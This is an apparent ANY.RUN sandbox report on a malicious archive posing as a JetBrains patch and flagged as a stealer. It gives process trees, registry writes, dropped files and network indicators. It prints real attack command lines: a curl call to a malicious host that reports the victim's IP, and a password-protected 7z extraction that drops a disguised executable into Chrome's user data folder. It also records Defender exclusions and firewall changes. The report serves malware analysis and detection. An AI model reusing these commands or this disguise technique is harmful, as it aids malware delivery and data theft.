File name: Patch.7z

Full analysis: https://app.any.run/tasks/14caf700-db1a-4cbb-abc1-9ce5f9bb0ee7
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: February 14, 2025, 19:22:36
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-exec
stealer
evasion
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5: DF50A016C6A467AFB1D9BAF64A8FA777
SHA1: 37B8B5564DA5860AD20B60348893D674A069E76A
SHA256: 21EC5341D805322B77C67A1E5886E03880D62B19BD8AFD6D07B101F920EA855F
SSDEEP: 98304:xrTw5/kwnXIubgPFuiSIy3lDg+6ABWEirS8Aj/OEbXwewKsh+uxxpuDs8342ReE3:DNK8Pkq003zScRcV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds process to the Windows Defender exclusion list

      • cmd.exe (PID: 640)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 640)
    • Actions looks like stealing of personal data

      • 7z.exe (PID: 1876)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
      • cmd.exe (PID: 640)
      • csrss.exe (PID: 616)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • Patch JB 2023.x.x.exe (PID: 6160)
      • 7z.exe (PID: 1876)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 6368)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Starts CMD.EXE for commands execution

      • Patch JB 2023.x.x.exe (PID: 6760)
    • Drops 7-zip archiver for unpacking

      • Patch JB 2023.x.x.exe (PID: 6160)
    • Script adds exclusion process to Windows Defender

      • cmd.exe (PID: 640)
    • Executing commands from a ".bat" file

      • Patch JB 2023.x.x.exe (PID: 6760)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 640)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 640)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 640)
    • Process drops legitimate windows executable

      • 7z.exe (PID: 1876)
    • Checks Windows Trust Settings

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • The process creates files with name similar to system file names

      • 7z.exe (PID: 1876)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • cmd.exe (PID: 640)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 640)
    • The executable file from the user directory is run by the CMD process

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Connects to unusual port

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Connects to SMTP port

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Checks for external IP

      • Windows Driver Foundation (WDF).exe (PID: 2976)
      • svchost.exe (PID: 2192)
  • INFO

    • The sample compiled with english language support

      • Patch JB 2023.x.x.exe (PID: 6160)
      • 7z.exe (PID: 1876)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 6368)
    • Execution of CURL command

      • cmd.exe (PID: 640)
    • Checks supported languages

      • curl.exe (PID: 7096)
      • 7z.exe (PID: 1876)
      • curl.exe (PID: 4020)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Reads the computer name

      • curl.exe (PID: 7096)
      • 7z.exe (PID: 1876)
      • curl.exe (PID: 4020)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Create files in a temporary directory

      • curl.exe (PID: 7096)
    • Creates files or folders in the user directory

      • 7z.exe (PID: 1876)
      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • The sample compiled with chinese language support

      • 7z.exe (PID: 1876)
    • The sample compiled with french language support

      • 7z.exe (PID: 1876)
    • The sample compiled with japanese language support

      • 7z.exe (PID: 1876)
    • The sample compiled with Italian language support

      • 7z.exe (PID: 1876)
    • The sample compiled with polish language support

      • 7z.exe (PID: 1876)
    • The sample compiled with korean language support

      • 7z.exe (PID: 1876)
    • The sample compiled with portuguese language support

      • 7z.exe (PID: 1876)
    • The sample compiled with russian language support

      • 7z.exe (PID: 1876)
    • The sample compiled with turkish language support

      • 7z.exe (PID: 1876)
    • The sample compiled with spanish language support

      • 7z.exe (PID: 1876)
    • The sample compiled with czech language support

      • 7z.exe (PID: 1876)
    • Creates files in the program directory

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Reads the machine GUID from the registry

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Checks proxy server information

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Disables trace logs

      • Windows Driver Foundation (WDF).exe (PID: 2976)
    • Reads the software policy settings

      • Windows Driver Foundation (WDF).exe (PID: 2976)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)

EXIF

ZIP

FileVersion: 7z v0.04
ModifyDate: 2023:06:27 17:36:29+00:00
ArchivedFileName: Patch JB 2023.x.x.exe
No data.
All screenshots are available in the full report
Total processes
162
Monitored processes
12
Malicious processes
3
Suspicious processes
5

Behavior graph

Process nodes in the graph, in the order shown ("no specs" marks a process with no indicators):
  • start
  • winrar.exe
  • patch jb 2023.x.x.exe
  • cmd.exe (no specs)
  • svchost.exe
  • patch jb 2023.x.x.exe
  • cmd.exe
  • curl.exe
  • 7z.exe
  • windows driver foundation (wdf).exe
  • curl.exe
  • rundll32.exe (no specs)
  • csrss.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID: 616
CMD: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
Path: C:\Windows\System32\csrss.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Client Server Runtime Process
Version:
10.0.19041.1 (WinBuild.160101.0800)
PID: 640
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\cc.bat""
Path: C:\Windows\System32\cmd.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 1876
CMD: "C:\Program Files (x86)\7-zip\7z.exe" x "C:\Users\admin\AppData\Local\Temp\NetFramework.4.5.7z" -o"C:\Users\admin\AppData\Local\google\chrome\user data" -pvdgdfgfHDSzxsHJCXdfdt45rtec5 -y
Path: C:\Program Files (x86)\7-Zip\7z.exe
Parent process: cmd.exe
User:
admin
Company:
Igor Pavlov
Integrity Level:
HIGH
Description:
7-Zip Console
Exit code:
0
Version:
22.01
Modules
Images
c:\program files (x86)\7-zip\7z.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\syswow64\msvcp_win.dll
PID: 2120
CMD: C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Path: C:\Windows\System32\rundll32.exe
Parent process: svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
PID: 2192
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2976
CMD: "C:\Users\admin\AppData\Local\google\chrome\user data\windows driver foundation (wdf).exe" -sdkKey 4e778bf2-7730-4884-91bb-ae9e7f00d213
Path: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Windows Driver Foundation (WDF).exe
Parent process: cmd.exe
User:
admin
Integrity Level:
HIGH
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\google\chrome\user data\windows driver foundation (wdf).exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
PID: 4020
CMD: curl -k -L "https://zeltitmp.net/pp/cu/cu.php?ip=84.17.49.16&vos=10&cid=DE&sid=jb23_3&pid=p2&s=1" --user-agent "cnfvp201"
Path: C:\Windows\System32\curl.exe
Parent process: cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID: 6160
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exe
Parent process: WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
PID: 6368
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\Patch.7z
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 6760
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.27993\Patch JB 2023.x.x.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.27993\Patch JB 2023.x.x.exe
Parent process: WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Total events
5 425
Read events
5 403
Write events
22
Delete events
0

Modification events

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\preferences.zip

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\chromium_ext.zip

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\Patch.7z

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (6368) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (2976) Windows Driver Foundation (WDF).exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Windows Driver Foundation (WDF)_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (2976) Windows Driver Foundation (WDF).exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Windows Driver Foundation (WDF)_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0
Executable files
192
Suspicious files
4
Text files
27
Unknown types
0

Dropped files

PID: 6160 | Process: Patch JB 2023.x.x.exe | Filename: C:\Users\admin\AppData\Local\Temp\qb13D4C8.66\jbl.7z
MD5:
SHA256:
PID: 1876 | Process: 7z.exe | Filename: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Microsoft.Extensions.DependencyInjection.Abstractions.xml | Type: xml
MD5: 5B265E477F90803DC73E4949142E79EA
SHA256: 2101D1050C7F6A1A59A2840082FCE4E0340C09C5D8A89126A49F1BDA47921008
PID: 6368 | Process: WinRAR.exe | Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.27993\Patch JB 2023.x.x.exe | Type: executable
MD5: 2225A9180E142415AE27486FC2631809
SHA256: 78DEA6CE89D0EF782AAEDDC45ABBF492F6B272E8804D9F1528E3FEA7AA81B6C6
PID: 6368 | Process: WinRAR.exe | Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa6368.29557\Patch JB 2023.x.x.exe | Type: executable
MD5: 2225A9180E142415AE27486FC2631809
SHA256: 78DEA6CE89D0EF782AAEDDC45ABBF492F6B272E8804D9F1528E3FEA7AA81B6C6
PID: 6160 | Process: Patch JB 2023.x.x.exe | Filename: C:\Users\admin\AppData\Local\Temp\qb13D4C8.66\7z2201.exe | Type: executable
MD5: 734E95CDBE04F53FE7C28EEAAAAD7327
SHA256: 8C8FBCF80F0484B48A07BD20E512B103969992DBF81B6588832B08205E3A1B43
PID: 6160 | Process: Patch JB 2023.x.x.exe | Filename: C:\Users\admin\AppData\Local\Temp\qb13D4C8.66\jbk.7z | Type: compressed
MD5: E4E67D6F10C69CB29C4815A2ECDA209F
SHA256: 52B7E3123089A575490BBD81342A10AD6ABA22FC54C2A7D5E6D1FC421E99F60D
PID: 6160 | Process: Patch JB 2023.x.x.exe | Filename: C:\Users\admin\AppData\Local\Temp\qb13D4C8.66\cnf | Type: text
MD5: 35E1BB2031151679C925845801ADEFBE
SHA256: 5F62EF0DF8A6B126356145B88954C150E2D56C4EE2312DE011A36949719A9849
PID: 1876 | Process: 7z.exe | Filename: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Microsoft.Bcl.AsyncInterfaces.xml | Type: xml
MD5: 1FC4BC74B30D484C24B04DE5C0A38F5E
SHA256: 3D06C35D7B0ECA37ABE2D135CFE12D1012816A99E5E92E0CF4E8501E1B540AAE
PID: 6160 | Process: Patch JB 2023.x.x.exe | Filename: C:\Users\admin\AppData\Local\Temp\qb13D4C8.66\jb.7z | Type: compressed
MD5: 3056453B2EA9A7987180A0F7C6E0601D
SHA256: B572E1B4AF12863E3444049875BC5FDFCF5B126F29938D4D1A46D3A473554C49
PID: 7096 | Process: curl.exe | Filename: C:\Users\admin\AppData\Local\Temp\NetFramework.4.5.7z | Type: compressed
MD5: 51C1EFD06927FAA106E78AEB03D48C0F
SHA256: D1D985FB50DC18EADCC6D7336B5CA5FA330619CD34D87B378402AB6D8A0A61C7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
48
DNS requests
28
Threats
8

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
4712 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.163:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
- | - | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | - | - | whitelisted
- | - | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | - | - | whitelisted
- | - | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | - | - | whitelisted
- | - | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | - | - | whitelisted
6600 | backgroundTaskHost.exe | GET | 200 | 23.54.109.203:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | - | - | whitelisted
2976 | Windows Driver Foundation (WDF).exe | GET | 200 | 51.159.182.2:80 | http://verification.repocket.com/api/peer/verification | unknown | - | - | unknown
2976 | Windows Driver Foundation (WDF).exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/json | unknown | - | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4712 | MoUsoCoreWorker.exe | 23.48.23.163:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4712 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
- | - | 20.73.194.208:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 104.126.37.128:443 | - | Akamai International B.V. | DE | unknown
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 2.19.106.8:443 | go.microsoft.com | AKAMAI-AS | DE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 2.21.65.132:443 | www.bing.com | Akamai International B.V. | NL | whitelisted
- | - | 2.23.77.188:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted
- | - | 34.117.59.81:443 | ipinfo.io | GOOGLE-CLOUD-PLATFORM | US | whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 172.217.18.14
  • 142.250.186.142
whitelisted
crl.microsoft.com
  • 23.48.23.163
  • 23.48.23.159
  • 23.48.23.161
  • 23.48.23.172
  • 23.48.23.173
  • 23.48.23.169
  • 23.48.23.170
  • 23.48.23.160
  • 23.48.23.166
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
go.microsoft.com
  • 2.19.106.8
whitelisted
www.bing.com
  • 2.21.65.132
  • 2.21.65.154
whitelisted
ocsp.digicert.com
  • 2.23.77.188
  • 23.54.109.203
whitelisted
ipinfo.io
  • 34.117.59.81
whitelisted
login.live.com
  • 20.190.159.4
  • 40.126.31.0
  • 40.126.31.128
  • 40.126.31.129
  • 20.190.159.130
  • 40.126.31.1
  • 20.190.159.71
  • 40.126.31.73
whitelisted
c.zeltitmp.net
  • 141.136.39.211
malicious
zeltitmp.net
  • 141.136.39.211
malicious

Threats

PID | Process | Class | Message
2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO Possible External IP Lookup Domain Observed in SNI (ipinfo. io)
2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup SSL Cert Observed (ipinfo .io)
2192 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com)
2976 | Windows Driver Foundation (WDF).exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup ip-api.com
2192 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
No debug info